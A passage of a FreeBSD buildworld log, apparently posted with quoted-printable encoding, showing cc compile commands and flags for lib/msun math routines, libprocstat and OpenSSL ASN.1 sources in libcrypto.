-Wno-string-plus-int -Wno-unuse= d-const-variable -Wno-tautological-compare -Wno-unused-value -Wno-parenthes= es-equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-local-typ= edef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-parenthe= ses -Qunused-arguments -c /usr/src/lib/msun/src/e_atan2l.c -o e_atan2l.So --- e_atanhl.So --- cc -fpic -DPIC -g -O2 -pipe -I/usr/src/lib/msun/x86 -I/usr/src/lib/msun/ld= 80 -I/usr/src/lib/msun/i387 -I/usr/src/lib/msun/src -I/usr/src/lib/libc/inc= lude -I/usr/src/lib/libc/i386 -MD -MF.depend.e_atanhl.So -MTe_atanhl.So= -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-pointe= r-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno-unuse= d-const-variable -Wno-tautological-compare -Wno-unused-value -Wno-parenthes= es-equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-local-typ= edef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-parenthe= ses -Qunused-arguments -c /usr/src/lib/msun/src/e_atanhl.c -o e_atanhl.So --- e_coshl.So --- cc -fpic -DPIC -g -O2 -pipe -I/usr/src/lib/msun/x86 -I/usr/src/lib/msun/ld= 80 -I/usr/src/lib/msun/i387 -I/usr/src/lib/msun/src -I/usr/src/lib/libc/inc= lude -I/usr/src/lib/libc/i386 -MD -MF.depend.e_coshl.So -MTe_coshl.So -= std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-pointer-= sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno-unused-= const-variable -Wno-tautological-compare -Wno-unused-value -Wno-parentheses= -equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-local-typed= ef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-parenthese= s -Qunused-arguments -c /usr/src/lib/msun/src/e_coshl.c -o e_coshl.So --- secure/lib/libcrypto__L --- --- x_exten.o --- cc -O2 -pipe -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl -D= TERMIOS -DANSI_SOURCE -DOPENSSL_THREADS -DDSO_DLFCN -DHAVE_DLFCN_H -DL_ENDI= AN -DOPENSSL_IA32_SSE2 -DAES_ASM -DVPAES_ASM -DOPENSSL_BN_ASM_PART_WORDS -D= OPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DMD5_ASM -DGHASH_ASM -DRMD160_AS= M -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DWHIRLPOOL_ASM -I/usr/obj/usr/src/s= ecure/lib/libcrypto -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl= /crypto -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/asn1= -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/evp -I/usr/= src/secure/lib/libcrypto/../../../crypto/openssl/crypto/modes -MD -MF.depe= nd.x_exten.o -MTx_exten.o -std=3Dgnu89 -fstack-protector-strong -Wno-pointe= r-sign -Wno-empty-body -Wno-string-plus-int -Wno-unused-const-variable -Wno= -tautological-compare -Wno-unused-value -Wno-parentheses-equality -Wno-unus= ed-function -Wno-enum-conversion -Wno-unused-local-typedef -Wno-switch -Wno= -switch-enum -Wno-knr-promoted-parameter -Wno-parentheses -Qunused-argumen= ts -c /usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/asn1/x_= exten.c -o x_exten.o --- lib/msun__L --- --- e_fmodl.So --- cc -fpic -DPIC -g -O2 -pipe -I/usr/src/lib/msun/x86 -I/usr/src/lib/msun/ld= 80 -I/usr/src/lib/msun/i387 -I/usr/src/lib/msun/src -I/usr/src/lib/libc/inc= lude -I/usr/src/lib/libc/i386 -MD -MF.depend.e_fmodl.So -MTe_fmodl.So -= std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-pointer-= sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno-unused-= const-variable -Wno-tautological-compare -Wno-unused-value -Wno-parentheses= -equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-local-typed= ef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-parenthese= s -Qunused-arguments -c /usr/src/lib/msun/src/e_fmodl.c -o e_fmodl.So --- lib/libprocstat__L --- --- msdosfs.o --- cc -O2 -pipe -I. -I/usr/src/lib/libprocstat -D_KVM_VNODE -DLIBPROCSTAT_= ZFS -MD -MF.depend.msdosfs.o -MTmsdosfs.o -std=3Dgnu99 -fstack-protector-s= trong -Wsystem-headers -Werror -Wall -Wno-format-y2k -W -Wno-unused-paramet= er -Wstrict-prototypes -Wmissing-prototypes -Wpointer-arith -Wreturn-type -= Wcast-qual -Wwrite-strings -Wswitch -Wshadow -Wunused-parameter -Wcast-alig= n -Wchar-subscripts -Winline -Wnested-externs -Wredundant-decls -Wold-style= -definition -Wno-pointer-sign -Wmissing-variable-declarations -Wthread-safe= ty -Wno-empty-body -Wno-string-plus-int -Wno-unused-const-variable -Qunuse= d-arguments -c /usr/src/lib/libprocstat/msdosfs.c -o msdosfs.o --- lib/msun__L --- --- e_hypotl.So --- cc -fpic -DPIC -g -O2 -pipe -I/usr/src/lib/msun/x86 -I/usr/src/lib/msun/ld= 80 -I/usr/src/lib/msun/i387 -I/usr/src/lib/msun/src -I/usr/src/lib/libc/inc= lude -I/usr/src/lib/libc/i386 -MD -MF.depend.e_hypotl.So -MTe_hypotl.So= -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-pointe= r-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno-unuse= d-const-variable -Wno-tautological-compare -Wno-unused-value -Wno-parenthes= es-equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-local-typ= edef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-parenthe= ses -Qunused-arguments -c /usr/src/lib/msun/src/e_hypotl.c -o e_hypotl.So --- lib/libprocstat__L --- --- smbfs.o --- cc -O2 -pipe -I. -I/usr/src/lib/libprocstat -D_KVM_VNODE -DLIBPROCSTAT_= ZFS -MD -MF.depend.smbfs.o -MTsmbfs.o -std=3Dgnu99 -fstack-protector-stron= g -Wsystem-headers -Werror -Wall -Wno-format-y2k -W -Wno-unused-parameter -= Wstrict-prototypes -Wmissing-prototypes -Wpointer-arith -Wreturn-type -Wcas= t-qual -Wwrite-strings -Wswitch -Wshadow -Wunused-parameter -Wcast-align -W= char-subscripts -Winline -Wnested-externs -Wredundant-decls -Wold-style-def= inition -Wno-pointer-sign -Wmissing-variable-declarations -Wthread-safety -= Wno-empty-body -Wno-string-plus-int -Wno-unused-const-variable -Qunused-ar= guments -c /usr/src/lib/libprocstat/smbfs.c -o smbfs.o --- secure/lib/libcrypto__L --- --- x_info.o --- cc -O2 -pipe -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl -D= TERMIOS -DANSI_SOURCE -DOPENSSL_THREADS -DDSO_DLFCN -DHAVE_DLFCN_H -DL_ENDI= AN -DOPENSSL_IA32_SSE2 -DAES_ASM -DVPAES_ASM -DOPENSSL_BN_ASM_PART_WORDS -D= OPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DMD5_ASM -DGHASH_ASM -DRMD160_AS= M -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DWHIRLPOOL_ASM -I/usr/obj/usr/src/s= ecure/lib/libcrypto -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl= /crypto -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/asn1= -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/evp -I/usr/= src/secure/lib/libcrypto/../../../crypto/openssl/crypto/modes -MD -MF.depe= nd.x_info.o -MTx_info.o -std=3Dgnu89 -fstack-protector-strong -Wno-pointer-= sign -Wno-empty-body -Wno-string-plus-int -Wno-unused-const-variable -Wno-t= autological-compare -Wno-unused-value -Wno-parentheses-equality -Wno-unused= -function -Wno-enum-conversion -Wno-unused-local-typedef -Wno-switch -Wno-s= witch-enum -Wno-knr-promoted-parameter -Wno-parentheses -Qunused-arguments= -c /usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/asn1/x_in= fo.c -o x_info.o --- lib/msun__L --- --- e_lgammal.So --- cc -fpic -DPIC -g -O2 -pipe -I/usr/src/lib/msun/x86 -I/usr/src/lib/msun/ld= 80 -I/usr/src/lib/msun/i387 -I/usr/src/lib/msun/src -I/usr/src/lib/libc/inc= lude -I/usr/src/lib/libc/i386 -MD -MF.depend.e_lgammal.So -MTe_lgammal.= So -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-poin= ter-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno-unu= sed-const-variable -Wno-tautological-compare -Wno-unused-value -Wno-parenth= eses-equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-local-t= ypedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-parent= heses -Qunused-arguments -c /usr/src/lib/msun/src/e_lgammal.c -o e_lgamma= l.So --- lib/libprocstat__L --- --- udf.o --- cc -O2 -pipe -I. -I/usr/src/lib/libprocstat -D_KVM_VNODE -DLIBPROCSTAT_= ZFS -MD -MF.depend.udf.o -MTudf.o -std=3Dgnu99 -fstack-protector-strong -W= system-headers -Werror -Wall -Wno-format-y2k -W -Wno-unused-parameter -Wstr= ict-prototypes -Wmissing-prototypes -Wpointer-arith -Wreturn-type -Wcast-qu= al -Wwrite-strings -Wswitch -Wshadow -Wunused-parameter -Wcast-align -Wchar= -subscripts -Winline -Wnested-externs -Wredundant-decls -Wold-style-definit= ion -Wno-pointer-sign -Wmissing-variable-declarations -Wthread-safety -Wno-= empty-body -Wno-string-plus-int -Wno-unused-const-variable -Qunused-argume= nts -c /usr/src/lib/libprocstat/udf.c -o udf.o --- lib/msun__L --- --- e_lgammal_r.So --- cc -fpic -DPIC -g -O2 -pipe -I/usr/src/lib/msun/x86 -I/usr/src/lib/msun/ld= 80 -I/usr/src/lib/msun/i387 -I/usr/src/lib/msun/src -I/usr/src/lib/libc/inc= lude -I/usr/src/lib/libc/i386 -MD -MF.depend.e_lgammal_r.So -MTe_lgamma= l_r.So -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-= pointer-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno= -unused-const-variable -Wno-tautological-compare -Wno-unused-value -Wno-par= entheses-equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-loc= al-typedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-pa= rentheses -Qunused-arguments -c /usr/src/lib/msun/ld80/e_lgammal_r.c -o e= _lgammal_r.So --- secure/lib/libcrypto__L --- --- x_long.o --- cc -O2 -pipe -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl -D= TERMIOS -DANSI_SOURCE -DOPENSSL_THREADS -DDSO_DLFCN -DHAVE_DLFCN_H -DL_ENDI= AN -DOPENSSL_IA32_SSE2 -DAES_ASM -DVPAES_ASM -DOPENSSL_BN_ASM_PART_WORDS -D= OPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DMD5_ASM -DGHASH_ASM -DRMD160_AS= M -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DWHIRLPOOL_ASM -I/usr/obj/usr/src/s= ecure/lib/libcrypto -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl= /crypto -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/asn1= -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/evp -I/usr/= src/secure/lib/libcrypto/../../../crypto/openssl/crypto/modes -MD -MF.depe= nd.x_long.o -MTx_long.o -std=3Dgnu89 -fstack-protector-strong -Wno-pointer-= sign -Wno-empty-body -Wno-string-plus-int -Wno-unused-const-variable -Wno-t= autological-compare -Wno-unused-value -Wno-parentheses-equality -Wno-unused= -function -Wno-enum-conversion -Wno-unused-local-typedef -Wno-switch -Wno-s= witch-enum -Wno-knr-promoted-parameter -Wno-parentheses -Qunused-arguments= -c /usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/asn1/x_lo= ng.c -o x_long.o --- lib/libprocstat__L --- --- zfs/zfs.So --- --- zfs.So --- cc -fpic -DPIC -g -O2 -pipe -I/usr/src/lib/libprocstat/zfs/../../../sys/cd= dl/compat/opensolaris -I/usr/src/lib/libprocstat/zfs/../../../cddl/compat/o= pensolaris/include -I/usr/src/lib/libprocstat/zfs/../../../cddl/compat/open= solaris/lib/libumem -I/usr/src/lib/libprocstat/zfs/../../../cddl/contrib/op= ensolaris/lib/libzpool/common -I/usr/src/lib/libprocstat/zfs/../../../sys/c= ddl/contrib/opensolaris/common/zfs -I/usr/src/lib/libprocstat/zfs/../../../= sys/cddl/contrib/opensolaris/uts/common/fs/zfs -I/usr/src/lib/libprocstat/z= fs/../../../sys/cddl/contrib/opensolaris/uts/common -I/usr/src/lib/libprocs= tat/zfs/../../../sys/cddl/contrib/opensolaris/uts/common/sys -I/usr/src/lib= /libprocstat/zfs/../../../cddl/contrib/opensolaris/head -I/usr/src/lib/libp= rocstat/zfs/.. -DNEED_SOLARIS_BOOLEAN -std=3Dgnu99 -fstack-protector-str= ong -Wsystem-headers -Werror -Wno-pointer-sign -Wno-empty-body -Wno-string-= plus-int -Wno-unused-const-variable -Wno-tautological-compare -Wno-unused-v= alue -Wno-parentheses-equality -Wno-unused-function -Wno-enum-conversion -W= no-unused-local-typedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-para= meter -Wno-parentheses -Qunused-arguments -c /usr/src/lib/libprocstat/zfs= /../zfs.c -o zfs.So --- secure/lib/libcrypto__L --- --- x_name.o --- cc -O2 -pipe -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl -D= TERMIOS -DANSI_SOURCE -DOPENSSL_THREADS -DDSO_DLFCN -DHAVE_DLFCN_H -DL_ENDI= AN -DOPENSSL_IA32_SSE2 -DAES_ASM -DVPAES_ASM -DOPENSSL_BN_ASM_PART_WORDS -D= OPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DMD5_ASM -DGHASH_ASM -DRMD160_AS= M -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DWHIRLPOOL_ASM -I/usr/obj/usr/src/s= ecure/lib/libcrypto -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl= /crypto -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/asn1= -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/evp -I/usr/= src/secure/lib/libcrypto/../../../crypto/openssl/crypto/modes -MD -MF.depe= nd.x_name.o -MTx_name.o -std=3Dgnu89 -fstack-protector-strong -Wno-pointer-= sign -Wno-empty-body -Wno-string-plus-int -Wno-unused-const-variable -Wno-t= autological-compare -Wno-unused-value -Wno-parentheses-equality -Wno-unused= -function -Wno-enum-conversion -Wno-unused-local-typedef -Wno-switch -Wno-s= witch-enum -Wno-knr-promoted-parameter -Wno-parentheses -Qunused-arguments= -c /usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/asn1/x_na= me.c -o x_name.o --- lib/msun__L --- --- e_sinhl.So --- cc -fpic -DPIC -g -O2 -pipe -I/usr/src/lib/msun/x86 -I/usr/src/lib/msun/ld= 80 -I/usr/src/lib/msun/i387 -I/usr/src/lib/msun/src -I/usr/src/lib/libc/inc= lude -I/usr/src/lib/libc/i386 -MD -MF.depend.e_sinhl.So -MTe_sinhl.So -= std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-pointer-= sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno-unused-= const-variable -Wno-tautological-compare -Wno-unused-value -Wno-parentheses= -equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-local-typed= ef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-parenthese= s -Qunused-arguments -c /usr/src/lib/msun/src/e_sinhl.c -o e_sinhl.So --- invtrig.So --- cc -fpic -DPIC -g -O2 -pipe -I/usr/src/lib/msun/x86 -I/usr/src/lib/msun/ld= 80 -I/usr/src/lib/msun/i387 -I/usr/src/lib/msun/src -I/usr/src/lib/libc/inc= lude -I/usr/src/lib/libc/i386 -MD -MF.depend.invtrig.So -MTinvtrig.So -= std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-pointer-= sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno-unused-= const-variable -Wno-tautological-compare -Wno-unused-value -Wno-parentheses= -equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-local-typed= ef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-parenthese= s -Qunused-arguments -c /usr/src/lib/msun/i387/invtrig.c -o invtrig.So --- lib/libprocstat__L --- --- cd9660.So --- cc -fpic -DPIC -g -O2 -pipe -I. -I/usr/src/lib/libprocstat -D_KVM_VNODE = -DLIBPROCSTAT_ZFS -MD -MF.depend.cd9660.So -MTcd9660.So -std=3Dgnu99 -fsta= ck-protector-strong -Wsystem-headers -Werror -Wall -Wno-format-y2k -W -Wno-= unused-parameter -Wstrict-prototypes -Wmissing-prototypes -Wpointer-arith -= Wreturn-type -Wcast-qual -Wwrite-strings -Wswitch -Wshadow -Wunused-paramet= er -Wcast-align -Wchar-subscripts -Winline -Wnested-externs -Wredundant-dec= ls -Wold-style-definition -Wno-pointer-sign -Wmissing-variable-declarations= -Wthread-safety -Wno-empty-body -Wno-string-plus-int -Wno-unused-const-var= iable -Qunused-arguments -c /usr/src/lib/libprocstat/cd9660.c -o cd9660.S= o --- lib/msun__L --- --- k_cosl.So --- cc -fpic -DPIC -g -O2 -pipe -I/usr/src/lib/msun/x86 -I/usr/src/lib/msun/ld= 80 -I/usr/src/lib/msun/i387 -I/usr/src/lib/msun/src -I/usr/src/lib/libc/inc= lude -I/usr/src/lib/libc/i386 -MD -MF.depend.k_cosl.So -MTk_cosl.So -st= d=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-pointer-si= gn -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno-unused-co= nst-variable -Wno-tautological-compare -Wno-unused-value -Wno-parentheses-e= quality -Wno-unused-function -Wno-enum-conversion -Wno-unused-local-typedef= -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-parentheses = -Qunused-arguments -c /usr/src/lib/msun/ld80/k_cosl.c -o k_cosl.So --- k_sinl.So --- cc -fpic -DPIC -g -O2 -pipe -I/usr/src/lib/msun/x86 -I/usr/src/lib/msun/ld= 80 -I/usr/src/lib/msun/i387 -I/usr/src/lib/msun/src -I/usr/src/lib/libc/inc= lude -I/usr/src/lib/libc/i386 -MD -MF.depend.k_sinl.So -MTk_sinl.So -st= d=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-pointer-si= gn -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno-unused-co= nst-variable -Wno-tautological-compare -Wno-unused-value -Wno-parentheses-e= quality -Wno-unused-function -Wno-enum-conversion -Wno-unused-local-typedef= -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-parentheses = -Qunused-arguments -c /usr/src/lib/msun/ld80/k_sinl.c -o k_sinl.So --- lib/libprocstat__L --- --- common_kvm.So --- cc -fpic -DPIC -g -O2 -pipe -I. -I/usr/src/lib/libprocstat -D_KVM_VNODE = -DLIBPROCSTAT_ZFS -MD -MF.depend.common_kvm.So -MTcommon_kvm.So -std=3Dgnu= 99 -fstack-protector-strong -Wsystem-headers -Werror -Wall -Wno-format-y2k = -W -Wno-unused-parameter -Wstrict-prototypes -Wmissing-prototypes -Wpointer= -arith -Wreturn-type -Wcast-qual -Wwrite-strings -Wswitch -Wshadow -Wunused= -parameter -Wcast-align -Wchar-subscripts -Winline -Wnested-externs -Wredun= dant-decls -Wold-style-definition -Wno-pointer-sign -Wmissing-variable-decl= arations -Wthread-safety -Wno-empty-body -Wno-string-plus-int -Wno-unused-c= onst-variable -Qunused-arguments -c /usr/src/lib/libprocstat/common_kvm.c= -o common_kvm.So --- lib/msun__L --- --- k_tanl.So --- cc -fpic -DPIC -g -O2 -pipe -I/usr/src/lib/msun/x86 -I/usr/src/lib/msun/ld= 80 -I/usr/src/lib/msun/i387 -I/usr/src/lib/msun/src -I/usr/src/lib/libc/inc= lude -I/usr/src/lib/libc/i386 -MD -MF.depend.k_tanl.So -MTk_tanl.So -st= d=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-pointer-si= gn -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno-unused-co= nst-variable -Wno-tautological-compare -Wno-unused-value -Wno-parentheses-e= quality -Wno-unused-function -Wno-enum-conversion -Wno-unused-local-typedef= -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-parentheses = -Qunused-arguments -c /usr/src/lib/msun/ld80/k_tanl.c -o k_tanl.So --- s_asinhl.So --- cc -fpic -DPIC -g -O2 -pipe -I/usr/src/lib/msun/x86 -I/usr/src/lib/msun/ld= 80 -I/usr/src/lib/msun/i387 -I/usr/src/lib/msun/src -I/usr/src/lib/libc/inc= lude -I/usr/src/lib/libc/i386 -MD -MF.depend.s_asinhl.So -MTs_asinhl.So= -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-pointe= r-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno-unuse= d-const-variable -Wno-tautological-compare -Wno-unused-value -Wno-parenthes= es-equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-local-typ= edef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-parenthe= ses -Qunused-arguments -c /usr/src/lib/msun/src/s_asinhl.c -o s_asinhl.So --- secure/lib/libcrypto__L --- --- x_nx509.o --- cc -O2 -pipe -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl -D= TERMIOS -DANSI_SOURCE -DOPENSSL_THREADS -DDSO_DLFCN -DHAVE_DLFCN_H -DL_ENDI= AN -DOPENSSL_IA32_SSE2 -DAES_ASM -DVPAES_ASM -DOPENSSL_BN_ASM_PART_WORDS -D= OPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DMD5_ASM -DGHASH_ASM -DRMD160_AS= M -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DWHIRLPOOL_ASM -I/usr/obj/usr/src/s= ecure/lib/libcrypto -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl= /crypto -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/asn1= -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/evp -I/usr/= src/secure/lib/libcrypto/../../../crypto/openssl/crypto/modes -MD -MF.depe= nd.x_nx509.o -MTx_nx509.o -std=3Dgnu89 -fstack-protector-strong -Wno-pointe= r-sign -Wno-empty-body -Wno-string-plus-int -Wno-unused-const-variable -Wno= -tautological-compare -Wno-unused-value -Wno-parentheses-equality -Wno-unus= ed-function -Wno-enum-conversion -Wno-unused-local-typedef -Wno-switch -Wno= -switch-enum -Wno-knr-promoted-parameter -Wno-parentheses -Qunused-argumen= ts -c /usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/asn1/x_= nx509.c -o x_nx509.o --- lib/msun__L --- --- s_atanl.So --- cc -fpic -DPIC -g -O2 -pipe -I/usr/src/lib/msun/x86 -I/usr/src/lib/msun/ld= 80 -I/usr/src/lib/msun/i387 -I/usr/src/lib/msun/src -I/usr/src/lib/libc/inc= lude -I/usr/src/lib/libc/i386 -MD -MF.depend.s_atanl.So -MTs_atanl.So -= std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-pointer-= sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno-unused-= const-variable -Wno-tautological-compare -Wno-unused-value -Wno-parentheses= -equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-local-typed= ef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-parenthese= s -Qunused-arguments -c /usr/src/lib/msun/src/s_atanl.c -o s_atanl.So --- lib/libprocstat__L --- --- core.So --- cc -fpic -DPIC -g -O2 -pipe -I. -I/usr/src/lib/libprocstat -D_KVM_VNODE = -DLIBPROCSTAT_ZFS -MD -MF.depend.core.So -MTcore.So -std=3Dgnu99 -fstack-p= rotector-strong -Wsystem-headers -Werror -Wall -Wno-format-y2k -W -Wno-unus= ed-parameter -Wstrict-prototypes -Wmissing-prototypes -Wpointer-arith -Wret= urn-type -Wcast-qual -Wwrite-strings -Wswitch -Wshadow -Wunused-parameter -= Wcast-align -Wchar-subscripts -Winline -Wnested-externs -Wredundant-decls -= Wold-style-definition -Wno-pointer-sign -Wmissing-variable-declarations -Wt= hread-safety -Wno-empty-body -Wno-string-plus-int -Wno-unused-const-variabl= e -Qunused-arguments -c /usr/src/lib/libprocstat/core.c -o core.So --- lib/msun__L --- --- s_cbrtl.So --- cc -fpic -DPIC -g -O2 -pipe -I/usr/src/lib/msun/x86 -I/usr/src/lib/msun/ld= 80 -I/usr/src/lib/msun/i387 -I/usr/src/lib/msun/src -I/usr/src/lib/libc/inc= lude -I/usr/src/lib/libc/i386 -MD -MF.depend.s_cbrtl.So -MTs_cbrtl.So -= std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-pointer-= sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno-unused-= const-variable -Wno-tautological-compare -Wno-unused-value -Wno-parentheses= -equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-local-typed= ef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-parenthese= s -Qunused-arguments -c /usr/src/lib/msun/src/s_cbrtl.c -o s_cbrtl.So --- secure/lib/libcrypto__L --- --- x_pkey.o --- cc -O2 -pipe -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl -D= TERMIOS -DANSI_SOURCE -DOPENSSL_THREADS -DDSO_DLFCN -DHAVE_DLFCN_H -DL_ENDI= AN -DOPENSSL_IA32_SSE2 -DAES_ASM -DVPAES_ASM -DOPENSSL_BN_ASM_PART_WORDS -D= OPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DMD5_ASM -DGHASH_ASM -DRMD160_AS= M -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DWHIRLPOOL_ASM -I/usr/obj/usr/src/s= ecure/lib/libcrypto -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl= /crypto -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/asn1= -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/evp -I/usr/= src/secure/lib/libcrypto/../../../crypto/openssl/crypto/modes -MD -MF.depe= nd.x_pkey.o -MTx_pkey.o -std=3Dgnu89 -fstack-protector-strong -Wno-pointer-= sign -Wno-empty-body -Wno-string-plus-int -Wno-unused-const-variable -Wno-t= autological-compare -Wno-unused-value -Wno-parentheses-equality -Wno-unused= -function -Wno-enum-conversion -Wno-unused-local-typedef -Wno-switch -Wno-s= witch-enum -Wno-knr-promoted-parameter -Wno-parentheses -Qunused-arguments= -c /usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/asn1/x_pk= ey.c -o x_pkey.o --- lib/msun__L --- --- s_cosl.So --- cc -fpic -DPIC -g -O2 -pipe -I/usr/src/lib/msun/x86 -I/usr/src/lib/msun/ld= 80 -I/usr/src/lib/msun/i387 -I/usr/src/lib/msun/src -I/usr/src/lib/libc/inc= lude -I/usr/src/lib/libc/i386 -MD -MF.depend.s_cosl.So -MTs_cosl.So -st= d=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-pointer-si= gn -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno-unused-co= nst-variable -Wno-tautological-compare -Wno-unused-value -Wno-parentheses-e= quality -Wno-unused-function -Wno-enum-conversion -Wno-unused-local-typedef= -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-parentheses = -Qunused-arguments -c /usr/src/lib/msun/src/s_cosl.c -o s_cosl.So --- lib/libprocstat__L --- --- libprocstat.So --- cc -fpic -DPIC -g -O2 -pipe -I. -I/usr/src/lib/libprocstat -D_KVM_VNODE = -DLIBPROCSTAT_ZFS -MD -MF.depend.libprocstat.So -MTlibprocstat.So -std=3Dg= nu99 -fstack-protector-strong -Wsystem-headers -Werror -Wall -Wno-format-y2= k -W -Wno-unused-parameter -Wstrict-prototypes -Wmissing-prototypes -Wpoint= er-arith -Wreturn-type -Wcast-qual -Wwrite-strings -Wswitch -Wshadow -Wunus= ed-parameter -Wcast-align -Wchar-subscripts -Winline -Wnested-externs -Wred= undant-decls -Wold-style-definition -Wno-pointer-sign -Wmissing-variable-de= clarations -Wthread-safety -Wno-empty-body -Wno-string-plus-int -Wno-unused= -const-variable -Qunused-arguments -c /usr/src/lib/libprocstat/libprocsta= t.c -o libprocstat.So --- secure/lib/libcrypto__L --- --- x_pubkey.o --- cc -O2 -pipe -I/usr/src/secure/lib/libcrypto/../../../crypto/openssl -D= TERMIOS -DANSI_SOURCE -DOPENSSL_THREADS -DDSO_DLFCN -DHAVE_DLFCN_H -DL_ENDI= AN -DOPENSSL_IA32_SSE2 -DAES_ASM -DVPAES_ASM -DOPENSSL_BN_ASM_PART_WORDS -D= OPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DMD5_ASM -DGHASH_ASM -DRMD160_AS= M -DSHA1_ASM -DSHA256_ASM 